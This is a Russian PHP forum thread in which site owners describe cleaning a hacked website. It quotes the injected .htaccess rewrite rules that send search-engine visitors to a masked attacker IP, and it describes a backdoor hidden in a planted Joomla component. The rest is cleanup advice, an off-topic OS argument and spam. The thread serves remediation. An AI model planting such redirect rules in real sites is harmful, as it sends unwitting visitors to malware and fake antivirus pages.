PHP форум

PHP форум

Форум техподдержки WR-Скриптов на php. Здесь обсуждаются: основы программирования на PHP, различные подходы к реализации скриптов. А также WR-скрипты: Доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Чат, Анекдот и т.д. Принимаются пожелания для новых версий. Пишите какой скрипт планируете увидеть, постараемся реализовать. Давайте сделаем бесплатные php скрипты лучше и доступны всем!!!
Главная сайтаГлавная сайта   ПоискПоиск   Участники  
Сегодня: 23.10.2018 - 22:14:27
Страницы:  1  
PHP форум » Защита от взлома » Как вылечить перенаправление на вредоносные сайты
Интересует Seo-проектирование в Москве? Организуйте тендер на Workspace.ru! К то подскажет продвижение сайта и раскрутка сайта это одно и тоже или нет?
АвторСообщение

Нина



гость
Решила написать о недавнем взломе сайта моей знакомой. Звонит мне Ира, говорит, трафик (посещаемость) на ее сайте резко снизился, чуть ли не до нуля – нажимаешь на какие-то ссылки на сайте – открываются не нужные страницы – загружаются вредоносные сайты, появляются новые папки на хостинге в ее сайте – в общем - ужас какой-то.

Когда пользователи открывают ее сайт – их просят установить антивирус и говорят, что сайт заражен программами-шпионами.

Если щелкнуть на картинку-ссылку левой кнопкой и посмотреть путь на зараженном сайте – появляется не обычный путь размещения картинки, а строка вида –

http : / / spyware-software.info/0/go.php?sid=2

Нашли информацию – это взлом FTP (подобранный пароль, если он несложный) и файла .htaccess, который обычно находится на один уровень выше на хостинге, чем папка /public html. Нужно открыть Блокнотом файл .htaccess и удалить оттуда строки типа:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]

Сам файл .htaccess удалять не нужно. Даже если в нем после удаления вредоносного кода ничего нет. Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644». (Каждый может этот файл прочитать – но перезаписывать – только владелец сайта).

Мы поменяли пароль на FTP – выбрали самый сложный. Антивирус обновили, проверили компьютер. И не стали запоминать пароли в VC и Dreamweaver. Сайт полностью перезалили с резервной копии – сначала стираешь все файлы в папке /public html (папке хранения сайта – для форматирования), а потом записываешь все новые файлы с резервной копии. Сейчас все нормально.
Я надеюсь, вы не забываете делать резервные копии вашего сайта? :)
Сообщение # 1 27.04.09 - 13:49:39

Maksir

эксперт





Статистика:
Тем создано: 0
Сообщений: 491
Репутация: 548 ±
Нарушения: 0
Нда.. однако.. =)
Вирусы...
Нина, есть операционные системы, в которых вирусы - не живут. Как вам такая новость? =)
Да и программы там есть все необходимые для работы, бесплтано. Хотите офис, или для графики что-нибудь.. И платные есть, по мере необходимости, потребности. Драйверов ненужно никаких. Обновления системы делается легко, если рядом интернет. Даже кодеки на халяву без лишних телодвижений можно установить, все самое свежее, - одним кликом по мышке.

О правильном хостинге нужно заботиться в вашея говорю о профессиональном хостинге, который стоит на Unix. Все что работает на Unix, в Windows - всего лишь эмуляция. Вы изначально воспринимаете ОС такой, какая она есть. А, какая же она есть на самом деле? Вот вам подсовывают Windows и для вас "компьютер и вирус" это синоним.

Главное отличие Windows от Unix (и им подобным) состоит в том, что Windows не имеет разделений между процессами. Любой процесс задачи можно обойти любым другим процессом. Прав на файл у пользователей Windows вообще нет, а потому владельцем может быть кто угодно. В Unix - имеется жёская динамичная архитектура прав, которую никто никогда не отменял.

По этому, атрибуты типа -- 644 на Windows-сервере, это всего лишь эмуляция Unix. В то время, как в действительности, файловая система Windows не гарантирует того, какие атрибуты вы прописываете.


    Цитата:
    Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644»


Если этот файл ненужен, то его можно удалить. Он там ни к чему. Права 644 означают - чтение для всех групп пользователей и запись только для владельца. Можно сделать 400 , ошибки не будет, если ваш хостинг правильно отконфигурирован. Точка в начале файла означает, что это скрытый файл. В системе Unix все файлы и каталоги с такой точкой - невидимы для обычных пользователей, даже, если выставлен атрибут на чтение для всех, кто не является владельцем и в даже не включен в группу пользователей - абсолютные права для всех.
--------------------------------------------------
Arch Linux
Сообщение # 2 27.04.09 - 18:35:21

Maksir

эксперт





Статистика:
Тем создано: 0
Сообщений: 491
Репутация: 548 ±
Нарушения: 0
Умняка прокатил?

Ты вот скажи что, линукс может предложить карпарациям?
Что линукс может предложить рабочим группам?
Что линукс может предложить простым людям? а не заумным?
И почему апачь делаеться под виндовс а iis под линукс не делаеться?

Да потому что виндовс лучше, в 10 тысячь раз!!!
Его популярность говорит об этом. А вирусы пишуться теми кто пишет антивирусы, и линуксоидами обиженными на винду!
--------------------------------------------------
Arch Linux
Сообщение # 3 16.08.09 - 22:11:18

Дмитрий

новичок




Статистика:
Тем создано: 3
Сообщений: 8
Репутация: 8 ±
Нарушения: 0
Молодые люди!!! апаче под линуксом стоит, с тех когда линукс преобразился в графическою оболочку и работает на много быстрее чем виндоский апаче. Просто линукс сначала был чиста кровный сервер, аж потом со временем он отправился к людям. И зайти на сервер с под линукса на линукс не легко, а с под виндоса на сервер линус не возможно(файловая система разная), а вот с линукса на виндос(фунци есть для копирование виндоских разделов ) не составит труда для хакера который только учится. Хотя и говорят, что для взлома сайта не имеет значение, однако большинства серверов предпочитают линукс. А самая КРУТАЯ ОПЕРАЦИОННАЯ это которую на писал ты сам. И кто не согласен, пусть подумает хорошенько.
Сообщение # 4 07.09.09 - 02:30:11

HawkDoom

новичок




Статистика:
Тем создано: 2
Сообщений: 4
Репутация: -1 ±
Нарушения: 0
Maksir, линуксоид обиженный на винду - тупой ламер.
У каждой оси свои плюсы и надо использовать их на своё благо.
В винде играть, в linux юзать сервера и т.д. - глупо говорить что какая то ось круче =))
А популярность винды говорит лишь о раскрутке манагерами корпорации своих продуктов, линукс же продукт в основном бесплатный и его популярность говорит лишь о его достоинствах.
Я оч часто юзаю виндовс - в ней много сред разработки которые удобней чем в линукс.
но серверная часть наоборот
Сообщение # 5 25.09.10 - 16:22:36

Виктор

новичок




Статистика:
Тем создано: 2
Сообщений: 38
Репутация: 18 ±
Нарушения: 0

    Цитата:
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]


была похожая проблема. Решил следующим образом:после полной проверки структуры сайта в папке components обнаружилась папка com_hello внутри которой нашелся свежий файл htaccess (этот же файл постоянно генерился и в папке \\имя_сайта.ru\htacsess). это был как признак того что искать надо внутри com_hello . и действительно при открытии файла joolog.php microsoft essentials заругалась на бэкдор. далее сравнил нужен ли этот com_hello с структурой квик старта и удалил. PS еще обратил внимание что папка com_hello образовалась здесь значительно позже чем все остальные. но при этом я сам в то время ничего на сайт не ставил. это тоже был признак что она добавлена искусственно. успехов!
Сообщение # 6 04.03.12 - 19:39:43

WR

Администратор





Статистика:
Тем создано: 952
Сообщений: 2538
Репутация: 3422 ±
Нарушения: 0
Спасибо за информацию. Вирусов эксплоитов всяких сейчас расплодилось много...
--------------------------------------------------
Бесплатные скрипты это клёво!
Сообщение # 7 06.03.12 - 17:13:27

salomonof

новичок




Статистика:
Тем создано: 0
Сообщений: 6
Репутация: 6 ±
Нарушения: 0
А если покупать его на долго хватит?

________________________
http://www.brandprint.ru/faksimile/
Сообщение # 8 11.03.13 - 14:31:47

WR

Администратор





Статистика:
Тем создано: 952
Сообщений: 2538
Репутация: 3422 ±
Нарушения: 0
Недавно был и у меня завирусован файл .htaccess. Сразу же удалил вирусный файл и загрузил свой. Файл .htaccess у меня такой:


    Код:

    DirectoryIndex index.php index.html
    AddDefaultCharset windows-1251
    ExpiresActive on
    ExpiresDefault "access plus 0 seconds"
    ExpiresByType text/html "access plus 0 seconds"
    Options +FollowSymLinks
    ErrorDocument 404 /404.html

    FileETag MTime Size
    <ifmodule mod_expires.c>
    <filesmatch ".(jpeg|jpg|gif|png|css|js)$">
    ExpiresActive on
    ExpiresDefault "access plus 1 month"
    </filesmatch>
    </ifmodule>

    Options All -Indexes

    Deny from 208.177.76.25
    Deny from 195.128.48.65
    Deny from 198.245.58.7
    Deny from 1.234.83.43


Если кому то интересно, то могу объяснить что означает каждая из команд
--------------------------------------------------
Бесплатные скрипты это клёво!
Сообщение # 9 12.01.14 - 17:58:48
PHP форум » Защита от взлома » Как вылечить перенаправление на вредоносные сайты
Защита от SQL-injection :Предыдущая темаСледующая тема: Закрытый форум
Страницы:  1  

Сообщение
Имя E-mail
Сообщение

Нажмите на точку возле имени, чтобы вставить обращение к участнику в сообщение

Смайлы:
Ещё смайлы

* При вставке видео с Ютубе нужно указывать только 'хвостик', например: BoUUbs3CvHs
           
Защитный код: (введите цифры, которые на синем фоне)
Ответ на вопрос: (Какой сейчас год?)
   
Фасадная плитка - стоимость вентилируемого фасада. Навесные вентилируемые фасады. WR-Счётчик
Powered by WR-Forum Professional © 2.1.1